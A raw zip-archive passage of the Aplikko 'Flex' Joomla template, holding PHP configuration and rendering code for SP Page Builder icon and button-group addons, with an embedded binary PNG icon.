						'desc'=>JText::_('FLEX_GLOBAL_BORDER_WIDTH_SIZE_DESC'),
						'placeholder'=>'2',
						),
		
					'border_radius'=>array(
						'type'=>'number',
						'title'=>JText::_('FLEX_GLOBAL_BORDER_RADIUS'),
						'desc'=>JText::_('FLEX_GLOBAL_BORDER_RADIUS_DESC'),
						'placeholder'=>'5',
						),
		
					'icon_margin'=>array(
						'type'=>'number',
						'title'=>JText::_('FLEX_ADDON_GLOBAL_MARGIN'),
						'desc'=>JText::_('FLEX_ADDON_GLOBAL_MARGIN_DESC'),
						'std'=>'',
						),			
		
					'padding'=>array(
						'type'=>'number',
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PADDING'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PADDING_DESC'),
						'placeholder'=>'10',
						),

					'url'=>array(
						'type'=>'text',
						'title'=>JText::_('FLEX_ADDON_ICONS_URL'),
						'desc'=>JText::_('FLEX_ADDON_ICONS_URL_DESC'),
						'placeholder'=>'http://',
						'std'=>'',
						),
					'url_target'=>array(
						'type'=>'select', 
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_DESC'),
						'values'=>array(
							''=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_SAME_WINDOW'),
							'_blank'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_NEW_WINDOW'),
							),
						),
					),
				),
			),
		),
	)
);
PK!Ұ~-��6flex/sppagebuilder/addons/icons/assets/images/icon.pngnu&1i��PNG


IHDR@@�iq�tEXtSoftwareAdobe ImageReadyq�e<?IDATx��[{PTU���7./AGš'0�t��)g�&���S��HG������b2�"1�&�L�Q��| ��
�
(���ݾ�l����ծs��s���|�wνWFd�����o�X�K�	 ���z�J�������.EJ+�9{�Q���|;q��@6$�ݮ`�f�1~%o�nw�Qc��8ƃn��a٠�ߔ;��
�)��>o晴�,IR����`s�/@�C2@rp�3����:
��n���nvCw�������x,ra�/kaŮ�41��+�rO��y�OW�*j�O�x��J0�s����~���'I7#]��<���I�e0��$"�l�l�H\w�@�27f@0���@/6��j�o��#�u���꿶����1����ԨψEw4x�����
C��n���Ͷϻ�
1a��s�Vcq��~�%F�~Y0-��/�B@8Q�T�\����1�n4����hz��>j�:�����5�xM:�U�'��!uAcFC*�IG��pE�����I2^C#b����
&���,ړ{Ţ.��
��lDž��"���D |}Jm����!���_O�s�FjM7h�z-�O��&4M��\}rE����q�<���e质9`?7��r���ۮ�$�ଛ�R� #ө��f�7a:��x4ڿ��t-�\Q���7�㚒��	�}-��\L���9��������>��.�B�/�J�3�Hq��h�MOO1k��l��s���V/�@�u��E�r�6YD����Q9�sn.�����n���>Yg6�:�E�<�ʻ9Ռ���	��'ꠤ��d[�����Tm�Q�K�ئRw	s���P�?���LP��;���;{����t��ځظ�Hӣ?,��2�@Y����T7��;7�wd�̈���8Y~�V3�.gD��wntx�;�Eu'�~��/�q8�[�#�I �gd���쐔Z�q���G�C oa�(�?Q�{����Ƅ���ѵ��]�y���x������)�2fȾ#�uQ�U�Xn�F'�M��U�
�qG�y1��F���7V��O�@��\�v4-�yɻ�t�
�	��g�p[���`��*���fs��NPی<���R�8O�����^��$�R���(��6#�2������-��P%kϹ7�Ju��ŝ�z@T!JT��}k���Vc"��(d��`��M%�\����b
�Ж�@`��+(&��oԭ#�H�-��J��ChO���P��:��z`j�u�X��({@#'��@��
�a��Pw�L@Et�hT��A�ˁR��X#�E�!�lpO�e!O�l��a=��|�B��Q?�{(������Ƈ‡�?l��XY3��s���}_||��k�B��f��b9,�.���jZaAl ���2������oH�4����^��6$b���r�Y�&�Ӂ�d��V��:"������k�$��\��r�Ñ�3C�%1�~���^�P��I4R�諳�ʒ�YH͏~���<B�"���	�P].@}m<X.��e}Mʿ��#f@c-U�2��+J&"��
r���6X�y������4h�SS`a�zF�ʗ%
l������#�6��i����B/G�J� �qԇ�?��Xqȡ_�������� I����Q�(�����V��|3�?Vҝz3�ԣH��E���F���q���;ae;K��όZ��H8ħ�hu�})��o.�ޅ;�x�ڟb���A'��l������ti�3���0#��X9%
FIEND�B`�PK!f�ܻ,,(flex/sppagebuilder/addons/icons/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2019 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

class SppagebuilderAddonIcons extends SppagebuilderAddons {

    public function render() {
        $settings = $this->addon->settings;
		
		// Repeatable Items
		$icon_items = (isset($settings->sp_icons_item) && $settings->sp_icons_item) ? $settings->sp_icons_item : '';

        //Addon Options
		// Title
		$title = (isset($settings->title) && $settings->title) ? $settings->title : '';
		$heading_selector = (isset($settings->heading_selector) && $settings->heading_selector) ? $settings->heading_selector : 'h3';
		
		$title_fontsize = (isset($settings->title_fontsize) && $settings->title_fontsize) ? $settings->title_fontsize : '';
		$title_fontweight = (isset($settings->title_fontweight) && $settings->title_fontweight) ? $settings->title_fontweight : '';
		$title_text_color = (isset($settings->title_text_color) && $settings->title_text_color) ? $settings->title_text_color : '';
		$title_margin_top = (isset($settings->title_margin_top) && $settings->title_margin_top) ? $settings->title_margin_top : 10;
		$title_margin_bottom = (isset($settings->title_margin_bottom) && $settings->title_margin_bottom) ? $settings->title_margin_bottom : 10;
		$margin_gap = (isset($settings->margin_gap) && $settings->margin_gap) ? 'margin:0 '. $settings->margin_gap .'px '. $settings->margin_gap .'px 0;' : 'margin:0 10px 10px 0;';
        $alignment = (isset($settings->alignment) && $settings->alignment) ? $settings->alignment : 'sppb-text-left';
		$class = (isset($settings->class) && $settings->class) ? $settings->class : '';
		$title_tooltip = (isset($settings->title_tooltip) && $settings->title_tooltip) ? 1 : 0;
		
		// Output starts
        $output = '';
		$icons_alignment = ' ' . $alignment . '';
		$class != '' ? $icon_class = ' ' . $class . '"' : $icon_class = '';
		
		$output .= '<div class="sppb-addon sppb-addon-icons ' . $icons_alignment . $class . '">';

		if($title) {
	
			$title_style = '';
			if($title_margin_top !='') $title_style .= 'margin-top:' . (int) $title_margin_top . 'px;';
			if($title_margin_bottom !='') $title_style .= 'margin-bottom:' . (int) $title_margin_bottom . 'px;';
			if($title_text_color) $title_style .= 'color:' . $title_text_color  . ';';
			if($title_fontsize) $title_style .= 'font-size:'.$title_fontsize.'px;line-height:'.$title_fontsize.'px;';
			if($title_fontweight) $title_style .= 'font-weight:'.$title_fontweight.';';
	
			$output .= '<'.$heading_selector.' class="sppb-addon-title" style="' . $title_style . '">' . $title . '</'.$heading_selector.'>';
		}
		
		$output .= '<div class="flex-icons' . $icons_alignment . $icon_class . '">';
	
				
		if(isset($settings->sp_icons_item) && is_array($settings->sp_icons_item)){
			foreach ($settings->sp_icons_item as $key => $icon_item) {
                
                $icon_title = (isset($icon_item->title) && $icon_item->title) ? $icon_item->title : '';
				$peicon_name = (isset($icon_item->peicon_name) && $icon_item->peicon_name) ? $icon_item->peicon_name : '';
				$icon_name = (isset($icon_item->icon_name) && $icon_item->icon_name) ? $icon_item->icon_name : '';
				$size = (isset($icon_item->size) && $icon_item->size) ? $icon_item->size : 24;
				$font_weight = (isset($icon_item->font_weight) && $icon_item->font_weight) ? $icon_item->font_weight : '';	
				$color = (isset($icon_item->color) && $icon_item->color) ? $icon_item->color : '';
				$background = (isset($icon_item->background) && $icon_item->background) ? $icon_item->background : '';		
				$border_color = (isset($icon_item->border_color) && $icon_item->border_color) ? $icon_item->border_color : '';
				$border_width = (isset($icon_item->border_width) && $icon_item->border_width) ? $icon_item->border_width : 0;
				$border_radius = (isset($icon_item->border_radius) && $icon_item->border_radius) ? $icon_item->border_radius : 0;
				$icon_margin = (isset($icon_item->icon_margin) && $icon_item->icon_margin) ? $icon_item->icon_margin : 0;
				$padding = (isset($icon_item->padding) && $icon_item->padding) ? $icon_item->padding : 0;
				$url = (isset($icon_item->url) && $icon_item->url) ? $icon_item->url : '';
				$url_target = (isset($icon_item->url_target) && $icon_item->url_target) ? $icon_item->url_target : '';
				
				$style = '';
				$font_size = '';
				$extra_style = '';
				$icon_class = '';
				$url != '' ? $icon_url = $url : $icon_url = '#';

				// Output 
				if($icon_name || $peicon_name) {

					if($icon_margin) $style .= 'margin:' . (int) $icon_margin . 'px;';
					
					if($padding) { 
						$style .= 'padding:' . (int) $padding  . 'px;';
					}
				
					$extra_style .= 'width:' . (int) $size . 'px;';
					$extra_style .= 'height:' . (int) $size . 'px;';
					$extra_style .= 'line-height:' . (int) $size . 'px;';
					($title_tooltip == 1) ? $icon_tooltip = ' title="'.$icon_title.'" data-toggle="tooltip"' : $icon_tooltip = '';
					
					$url_target != '' ? $icon_url_target = ' target="' . $url_target . '"' : $icon_url_target = '';
					
					if($color) $style .= 'color:'. $color  . ';';
					if($font_weight) $font_weight = 'font-weight:' . $font_weight  . ';';
					if($background) $style .= 'background-color:' . $background  . ';';
					if($border_color) $style .= 'border-style:solid;border-color:' . $border_color  . ';';
					if($border_width) $style .= 'border-width:' . (int) $border_width  . 'px;';
					if($border_radius) $style .= 'border-radius:' . (int) $border_radius  . 'px;';
			
					if($size) $font_size .= 'font-size:' . (int) $size . 'px;' . $font_weight . $extra_style .'';
			
					$output .= '<div'.$icon_tooltip.' style="' . $margin_gap . '" class="flex-icon-wrap">';
					$output .= '<a' . $icon_url_target . ' href="' . $icon_url . '">';
					$output .= '<span style="' . $style . '"' . $icon_class . '>';
					if ($peicon_name) {
						$output .= '<i class="pe ' . $peicon_name . '" style="' . $font_size . '"></i>';
					}else{
						$output .= '<i class="fa ' . $icon_name . '" style="' . $font_size . '"></i>';
					}
					$output .= '</span>';
					$output .= '</a>';
					
					$output .= '</div>';
				}
            }
        }
	
		$output .= '</div>';
		$output .= '</div>';
	
        return $output;
    }
	
}
PK!ϔH7�)�)0flex/sppagebuilder/addons/button_group/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2019 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

//Include Pixeden Icons
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

SpAddonsConfig::addonConfig(
	array(
		'type'=>'general',
		'addon_name'=>'sp_button_group',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_GROUP'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_GROUP_DESC'),
		'category'=>'Content',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT_DESC'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'sppb-text-center',
				),

				'margin'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_BUTTON_GROUP_GUTTER'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_BUTTON_GROUP_GUTTER_DESC'),
					'responsive'=>true,
					'max'=>100,
					'std'=>array('md'=>5),
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=> '',
				),

				// Repeatable Items
				'sp_button_group_item'=>array(
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_BUTTONS_ITEM'),
					'attr'=>  array(

						'title'=>array(
							'type'=>'text',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT_DESC'),
							'std'=>'Button',
						),

						'font_family'=>array(
							'type'=>'fonts',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONT_FAMILY'),
							'selector'=> array(
								'type'=>'font',
								'font'=>'{{ VALUE }}',
								'css'=>'.sppb-btn { font-family: {{ VALUE }}; }'
							)
						),

						'font_style'=>array(
							'type'=>'fontstyle',
							'title'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_FONT_STYLE'),
							'std'=>''
						),

						'letterspace'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_LETTER_SPACING'),
							'values'=>array(
								'0'=> 'Default',
								'1px'=> '1px',
								'2px'=> '2px',
								'3px'=> '3px',
								'4px'=> '4px',
								'5px'=> '5px',
								'6px'=>	'6px',
								'7px'=>	'7px',
								'8px'=>	'8px',
								'9px'=>	'9px',
								'10px'=> '10px'
							),
							'std'=>'0'
						),

						'url'=>array(
							'type'=>'media',
							'format'=>'attachment',
							'hide_preview'=>true,
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL_DESC'),
							'placeholder'=>'http://',
							'hide_preview'=>true,
						),

						'type'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE_DESC'),
							'values'=>array(
								'default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
								'flex'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
								'dark'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DARK'),
								'light'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LIGHT'),
								'primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
								'secondary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SECONDARY'),
								'success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
								'info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
								'warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
								'danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
								'link'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
								'custom'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CUSTOM'),
							),
							'std'=>'primary',
						),

						'appearance'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_DESC'),
							'values'=>array(
								''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_FLAT'),
								'outline'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_OUTLINE'),
								'3d'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_3D'),
								'gradient'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_GRADIENT'),
							),
							'std'=>'flat',
						),

						'button_status'=>array(
							'type'=>'buttons',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ENABLE_BACKGROUND_OPTIONS'),
							'std'=>'normal',
							'values'=>array(
								array(
									'label' => 'Normal',
									'value' => 'normal'
								),
								array(
									'label' => 'Hover',
									'value' => 'hover'
								),
							),
							'tabs' => true,
							'depends'=>array(
								array('type', '=', 'custom'),
							)
						),

						'background_color'=>array(
							'type'=>'color',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_DESC'),
							'std' => '#dc4a3e',
							'depends'=>array(
								array('appearance', '!=', 'gradient'),
								array('type', '=', 'custom'),
								array('button_status', '=', 'normal'),
							)
						),

						'background_gradient'=>array(
							'type'=>'gradient',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
							'std'=> array(
								"color" => "#fd6f64",
								"color2" => "#dc4a3e",
								"deg" => "45",
								"type" => "linear"
							),
							'depends'=>array(
								array('appearance', '=', 'gradient'),
								array('type', '=', 'custom'),
								array('button_status', '=', 'normal'),
							)
						),

						'color'=>array(
							'type'=>'color',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_DESC'),
							'std' => '#fff',
							'depends'=>array(
								array('type', '=', 'custom'),
								array('button_status', '=', 'normal'),
							),
						),

						'background_color_hover'=>array(
							'type'=>'color',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER_DESC'),
							'std' => '#222',
							'depends'=>array(
								array('appearance', '!=', 'gradient'),
								array('type', '=', 'custom'),
								array('button_status', '=', 'hover'),
							)
						),

						'background_gradient_hover'=>array(
							'type'=>'gradient',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
							'std'=> array(
								"color" => "#f77367",
								"color2" => "#f35546",
								"deg" => "45",
								"type" => "linear"
							),
							'depends'=>array(
								array('appearance', '=', 'gradient'),
								array('type', '=', 'custom'),
								array('button_status', '=', 'hover'),
							)
						),

						'color_hover'=>array(
							'type'=>'color',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER_DESC'),
							'std' => '#fff',
							'depends'=>array(
								array('type', '=', 'custom'),
								array('button_status', '=', 'hover'),
							),
						),

						'size'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DESC'),
							'values'=>array(
								''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DEFAULT'),
								'lg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_LARGE'),
								'xlg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_XLARGE'),
								'sm'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_SMALL'),
								'xs'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_EXTRA_SAMLL'),
							),
						),

						'button_padding'=>array(
							'type'=>'padding',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING_DESC'),
							'std' => '',
							'depends'=> array(
								array('type', '=', 'custom'),
							),
							'responsive'=>true
						),

						'shape'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_DESC'),
							'values'=>array(
								'rounded'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUNDED'),
								'square'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_SQUARE'),
								'round'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUND'),
							),
						),

						'block'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK_DESC'),
							'values'=>array(
								''=>JText::_('JNO'),
								'sppb-btn-block'=>JText::_('JYES'),
							),
						),
						
						'peicon_name'=>array( // Pixeden Icons
							'type'=>'select', 
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME_DESC'),
							'values'=> $peicon_list
						),		

						'icon'=>array(
							'type'=>'icon',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME_DESC'),
						),

						'icon_position'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_POSITION'),
							'values'=>array(
								'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
								'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
							),
						),

						'target'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB_DESC'),
							'values'=>array(
								''=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_SAME_WINDOW'),
								'_blank'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_NEW_WINDOW'),
							),
						),
					),
				),
			),
		),
	)
);
PK!��.�G�G/flex/sppagebuilder/addons/button_group/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2019 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted aceess');

class SppagebuilderAddonButton_group extends SppagebuilderAddons{

	public function render() {

		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? ' ' . $this->addon->settings->class : '';
		$class .= (isset($this->addon->settings->alignment) && $this->addon->settings->alignment) ? ' ' . $this->addon->settings->alignment : '';

		$output  = '<div class="sppb-addon sppb-addon-button-group' . $class . '">';
		$output .= '<div class="sppb-addon-content">';

		if(isset($this->addon->settings->sp_button_group_item) && count((array) $this->addon->settings->sp_button_group_item)){

			foreach ($this->addon->settings->sp_button_group_item as $key => $value) {
				if($value->title || $value->icon) {
					$class  = (isset($value->type) && $value->type) ? ' sppb-btn-' . $value->type : '';
					$class .= (isset($value->size) && $value->size) ? ' sppb-btn-' . $value->size : '';
					$class .= (isset($value->block) && $value->block) ? ' ' . $value->block : '';
					$class .= (isset($value->shape) && $value->shape) ? ' sppb-btn-' . $value->shape: ' sppb-btn-rounded';
					$class .= (isset($value->appearance) && $value->appearance) ? ' sppb-btn-' . $value->appearance : '';
					$attribs = (isset($value->target) && $value->target) ? ' target="' . $value->target . '"': '';
					$attribs .= (isset($value->url) && $value->url) ? ' href="' . $value->url . '"': '';
					$attribs .= ' id="btn-' . ($this->addon->id + $key) . '"';
					$text = (isset($value->title) && $value->title) ? $value->title: '';
					//Pixeden Icons
					$peicon_name = (isset($value->peicon_name) && $value->peicon_name) ? $value->peicon_name: '';
					$icon = (isset($value->icon) && $value->icon) ? $value->icon: '';
					$icon_position = (isset($value->icon_position) && $value->icon_position) ? $value->icon_position: 'left';

					if($icon_position == 'left') {
						if ($peicon_name) {
							$text = ($peicon_name) ? '<i class="pe ' . $peicon_name . '"></i> ' . $text : $text;
						}else{
							$text = ($icon) ? '<i class="fa ' . $icon . '"></i> ' . $text : $text;
						}	
					} else {
						if ($peicon_name) {
							$text = ($peicon_name) ? $text . ' <i style="margin-left:5px;margin-right:-1px;" class="pe ' . $peicon_name . '"></i>' : $text;
						}else{
							$text = ($icon) ? $text . ' <i style="margin-left:5px;margin-right:-1px;" class="fa ' . $icon . '"></i>' : $text;
						}
					}

					$output  .= '<a' . $attribs . ' class="sppb-btn ' . $class . '">' . $text . '</a>';
				}
			}
		}

		$output .= '</div>';
		$output .= '</div>';

		return $output;

	}

	public function css() {

		$addon_id = '#sppb-addon-' . $this->addon->id;
		$layout_path = JPATH_ROOT . '/components/com_sppagebuilder/layouts';
		$margin = (isset($this->addon->settings->margin) && $this->addon->settings->margin) ? $this->addon->settings->margin : '';
		$margin_sm = ((isset($this->addon->settings->margin_sm)) && $this->addon->settings->margin_sm) ? $this->addon->settings->margin_sm : '';
		$margin_xs = ((isset($this->addon->settings->margin_xs)) && $this->addon->settings->margin_xs) ? $this->addon->settings->margin_xs : '';

		$css = '';
		if($margin) {
			$css .= $addon_id . ' .sppb-addon-content {';
			$css .= 'margin: -' . (int) $margin . 'px;';
			$css .= '}';

			$css .= $addon_id . ' .sppb-addon-content .sppb-btn {';
			$css .= 'margin: ' . (int) $margin . 'px;';
			$css .= '}';
		}

		if($margin_sm){
			$css .= '@media (min-width: 768px) and (max-width: 991px) {';
				$css .= $addon_id . ' .sppb-addon-content {';
					$css .= 'margin: -' . (int) $margin_sm . 'px;';
				$css .= '}';

				$css .= $addon_id . ' .sppb-addon-content .sppb-btn {';
					$css .= 'margin: ' . (int) $margin_sm . 'px;';
				$css .= '}';
			$css .= '}';
		}

		if($margin_xs){
			$css .= '@media (max-width: 767px) {';
				$css .= $addon_id . ' .sppb-addon-content {';
					$css .= 'margin: -' . (int) $margin_xs . 'px;';
				$css .= '}';

				$css .= $addon_id . ' .sppb-addon-content .sppb-btn {';
					$css .= 'margin: ' . (int) $margin_xs . 'px;';
				$css .= '}';
			$css .= '}';
		}

		// Buttons style
		if(isset($this->addon->settings->sp_button_group_item) && count((array) $this->addon->settings->sp_button_group_item)){
			foreach ($this->addon->settings->sp_button_group_item as $key => $value) {
				if($value->title) {
					$css_path = new JLayoutFile('addon.css.button', $layout_path);

					$options = new stdClass;
					$options->button_type = (isset($value->type) && $value->type) ? $value->type : '';
					$options->button_appearance = (isset($value->appearance) && $value->appearance) ? $value->appearance : '';
					$options->button_color = (isset($value->color) && $value->color) ? $value->color : '';
					$options->button_color_hover = (isset($value->color_hover) && $value->color_hover) ? $value->color_hover : '';
					$options->button_background_color = (isset($value->background_color) && $value->background_color) ? $value->background_color : '';
					$options->button_background_color_hover = (isset($value->background_color_hover) && $value->background_color_hover) ? $value->background_color_hover : '';
					$options->button_padding = (isset($value->button_padding) && $value->button_padding) ? $value->button_padding : '';
					$options->button_padding_sm = (isset($value->button_padding_sm) && $value->button_padding_sm) ? $value->button_padding_sm : '';
					$options->button_padding_xs = (isset($value->button_padding_xs) && $value->button_padding_xs) ? $value->button_padding_xs : '';
					$options->button_font_family = (isset($value->font_family) && $value->font_family) ? $value->font_family : '';
					$options->button_font_family_selector = (isset($value->font_family_selector) && $value->font_family_selector) ? $value->font_family_selector : '';
					$options->button_fontstyle = (isset($value->fontstyle) && $value->fontstyle) ? $value->fontstyle : '';
					$options->button_font_style = (isset($value->font_style) && $value->font_style) ? $value->font_style : '';
					$options->button_letterspace = (isset($value->letterspace) && $value->letterspace) ? $value->letterspace : '';
					$options->button_background_gradient = (isset($value->background_gradient) && $value->background_gradient) ? $value->background_gradient : new stdClass();
					$options->button_background_gradient_hover = (isset($value->background_gradient_hover) && $value->background_gradient_hover) ? $value->background_gradient_hover : new stdClass();

					$selector_css = new JLayoutFile('addon.css.selector', $layout_path);
					$css .= $selector_css->render(
					  array(
					    'options'=>$value,
					    'addon_id'=>$addon_id,
					    'selector'=>'#btn-' . ($this->addon->id + $key)
					  )
					);

					$css .= $css_path->render(array('addon_id' => $addon_id, 'options' => $options, 'id' => 'btn-' . ($this->addon->id + $key) ));
				}
			}
		}

		return $css;
	}
	
	public static function getTemplate() {
        $output = '
		<#
			var addonId = data.id;
		#>
		<style type="text/css">
			#sppb-addon-{{ addonId }} .sppb-addon-content {
				<# if(_.isObject(data.margin)){ #>
					margin: -{{ data.margin.md }}px;
				<# } else { #>
					margin: -{{ data.margin }}px;
				<# } #>
			}
			#sppb-addon-{{ addonId }} .sppb-addon-content .sppb-btn {
				<# if(_.isObject(data.margin)){ #>
					margin: {{ data.margin.md }}px;
				<# } else { #>
					margin: {{ data.margin }}px;
				<# } #>
			}
			<# _.each(data.sp_button_group_item, function(button, key){ #>
				<#

					let button_fontstyle = button.fontstyle || "";
					let button_font_style = button.font_style || "";
					let modern_font_style = false;

					let button_padding = "";
					let button_padding_sm = "";
					let button_padding_xs = "";

					let font_size = "";
					let font_size_sm = "";
					let font_size_xs = "";
					if(button.button_padding){
						if(_.isObject(button.button_padding)){
							if(_.trim(button.button_padding.md) !== ""){
								button_padding = _.split(button.button_padding.md, " ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}

							if(_.trim(button.button_padding.sm) !== ""){
								button_padding_sm = _.split(button.button_padding.sm, " ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}

							if(_.trim(button.button_padding.xs) !== ""){
								button_padding_xs = _.split(button.button_padding.xs, " ").map(item => {
